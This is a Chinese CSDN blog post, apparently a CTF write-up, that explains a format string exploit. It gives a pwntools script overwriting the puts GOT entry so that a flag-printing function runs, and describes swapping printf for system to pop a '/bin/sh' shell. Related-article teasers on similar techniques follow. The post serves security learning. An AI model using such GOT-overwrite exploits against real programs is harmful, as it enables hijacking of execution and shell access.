字符串格式化漏洞修改GOT表一例

最新推荐文章于 2023-03-06 18:21:26 发布
最新推荐文章于 2023-03-06 18:21:26 发布
阅读量856 收藏
点赞数
文章标签: linux c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Carrot_kexin/article/details/120677202
版权

代码如下:

from pwn import *
context(arch='amd64', os='linux')
elf = ELF("./pwn")
io = remote("111.200.241.244", 56315)
catflag_addr = 0x4008DA
puts_got = elf.got['puts']
payload = fmtstr_payload(6, {puts_got: catflag_addr})
io.recvuntil("3. Exit the battle")
io.sendline("2")
io.sendline(payload)
io.interactive()

原理是在0x4008DA这个地址有一个函数是直接system(“cat flag”)的,我们利用字符串格式化漏洞修改puts函数的GOT表,直接修改到上面这个黑客函数的地址,然后下一次调用puts的时候,就会直接进入黑客函数。

PLT表在运行时可能是只读的,不可修改。

这个题目里面有一段代码是scanf一个字符串,然后再把这个字符串printf出来,另一种利用方式是,修改printf函数的GOT表为system函数的地址,然后在scanf的时候直接输入"/bin/sh",这样就能直接拿到系统的shell。

Carrot_kexin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
格式化字符串漏洞自动检测与测试用例生成
04-30
格式化字符串漏洞是一种危害高、影响广的软件漏洞。当前漏洞检测方式存在人工依赖度高、误报率高、检测模型单一、未能充分考虑格式化字符串漏洞特点等多种局限性。针对以上问题,对格式化字符串漏洞特征进行分析,...
格式化字符串之在栈上修改got,执行system(“/bin/sh“)
fzucaicai的博客
03-05 721
举个例子, payload = fmtstr_payload(7 , {printf_got : system_addr}) 其中,7。
非栈上的格式化字符串利用例题讲解
最新发布
fzucaicai的博客
03-06 726
具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成。改got只能一次成型,因为如果分多次,导致printf的got改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。,然后修改指针指向的对应内容。
wdb_2018_2nd_easyfmt
weixin_43904731的博客
12-14 447
wdb_2018_2nd_easyfmt(格式化字符串)
printf 格式化 输出_64位格式化字符串漏洞修改got利用详解
weixin_39631295的博客
11-27 1249
前言格式化字符串漏洞是最基础也是很老的一个漏洞了,网上一搜索就会有一堆的解释、原理、以及利用,但全都是对32位的格式化漏洞的解析,64位的几乎没有,就算有也被一笔带过。但是当你利用格式化漏洞修改64位elfgot时,你会发现并没有详细的那么简单,虽然和32位的原理一样,但payload的构建方法却有所差别。甚至难度也大大增加故此有了此处尝试以及尝试后的一些总结漏洞分析程序源码:#...
pwn刷题num41---格式化字符串漏洞任意地址修改
tbsqigongzi的博客
05-02 593
BUUCTF-PWN-jarvisoj_fm 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got可写 开启canary保护-----栈溢出需要绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看伪代码 简单的代码,可知只要x=4就可获得shell 思路 用read函数输入一个字符串,之后printf格式化字符串漏洞实现任意地址修改,将x的值改为4 先找一下输入
Python字符串格式化
09-21
Python字符串格式化操作符(%)只适用于字符串类型,非常类似于C 语言里面的printf()函数的字符串格式化,甚至所用的符号都一样,都用百分号(%),并且支持所有printf()式的格式化操作。
Python字符串格式化的方法(两种)
12-25
本文介绍了Python字符串格式化,主要有两种方法,分享给大家,具体如下 用于字符串的拼接,性能更优。 字符串格式化有两种方式:百分号方式、format方式。 百分号方式比较老,而format方式是比较先进的,企图替代...
格式化字符串漏洞利用
04-14
格式化字符串漏洞利用
如何使用JS在HTML中自定义字符串格式化
10-19
在JavaScript中虽没有类似的方法,但我们可以利用字符串的replace方法自定义字符串格式化方法。下面通过本文给大家分享使用JS在HTML中自定义字符串格式化的方法,需要的的朋友参考下吧
【How2Pwn】DreamHack x86下的ROP问题
Jeongon的博客
09-13 311
x86下的ROP问题
elf文件的GOT和PLT
0pt1mus
05-06 1455
转自个人博客0pt1mus 0x00 写在开始 首先,我是从PE文件开始学习的,之后接触到了Linux下的ELF文件,在本质上来说,无论是Windows下的PE文件,还是Linux下的elf文件,他们本质上都是一个可执行文件,所运行的平台不同,它们的文件格式也有不同,但究其本质,还是会有互通的地方。 0x01 基础知识 首先,elf文件也是由众多的节构成的,可以通过objdump -h查看。 下...
CTF中的PWN——绕canary防护3(puts带出canary 泄露函数地址计算基地址)
壊壊的诱惑你的博客
10-14 2171
前言: 想要学好pwn,首先要看懂wp。此题断断续续占用了我两三天,原谅我太菜了。此题为攻防世界的babystack。金丝雀前文叙述过,此处不再阐述,绕过的首选办法就是想办法得到canary的值,因为程序每次load的时候canary都不同,但是一个进程中的所有方法的金丝雀的值都相同。得到canry的值后构造payload即可。 题目:babystack-攻防世界 file及...
格式化字符串漏洞泄露got
Fzuim的博客
11-20 686
#include <stdio.h> int main() { char s[100]; scanf("%s", s); printf(s); return 0; } 编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c 泄露的payload先贴出来,再理解 # coding:utf-8 from pwn import* from LibcSearcher import * context.log_level = '
[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got
mcmuyanga的博客
03-18 459
wustctf2020_name_your_dog 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb 主要函数,感觉跟cat那题差不多 漏洞函数 ...
PNW入门之got覆写
weixin_44681716的博客
05-06 3202
实验目的 实验文件 链接:https://pan.baidu.com/s/1ZSX-4AHSbJH1kGIncHjvbA 提取码:eh2k 实验步骤
pwnable BrainFuck,GOT重写
nibiru_holmes的博客
03-10 1175
题目链接:http://pwnable.kr/play.php BrainFuck是什么鬼,百度一下..... Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 其实就是闲着没事做出来的一种语言。 看看
[BUUCTF]REVERSE——wdb_2018_2nd_easyfmt(32位格式化字符串修改got
mcmuyanga的博客
03-08 872
wdb_2018_2nd_easyfmt 附件 步骤 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,看交互式的情况,知道存在格式化字符串漏洞 32位ida载入 利用思路: 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/bash\x00’ 利用过程: 找到偏移为6 打印print@got的地址 printf_got=elf.got["printf"] payloa
【Android 逆向】函数拦截原理 ( 通过修改 GOT 全局偏移拦截函数 | 通过在实际被调用的函数中添加跳转代码实现函数拦截 )
让 学习 成为一种 习惯 ( 韩曙亮 の 技术博客 )
11-08 910
一、通过修改 GOT 全局偏移拦截函数、 二、通过在实际被调用的函数中添加跳转代码实现函数拦截、
Windows堆溢出与格式化字符串漏洞利用深度解析
本文将深入探讨Windows平台下的两种关键漏洞利用技术:堆溢出和格式化字符串漏洞。堆溢出是针对内存管理中的缺陷,特别是当程序动态分配的堆内存超出其预期大小时,可能导致数据溢出到相邻的内存区域。作者强调,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值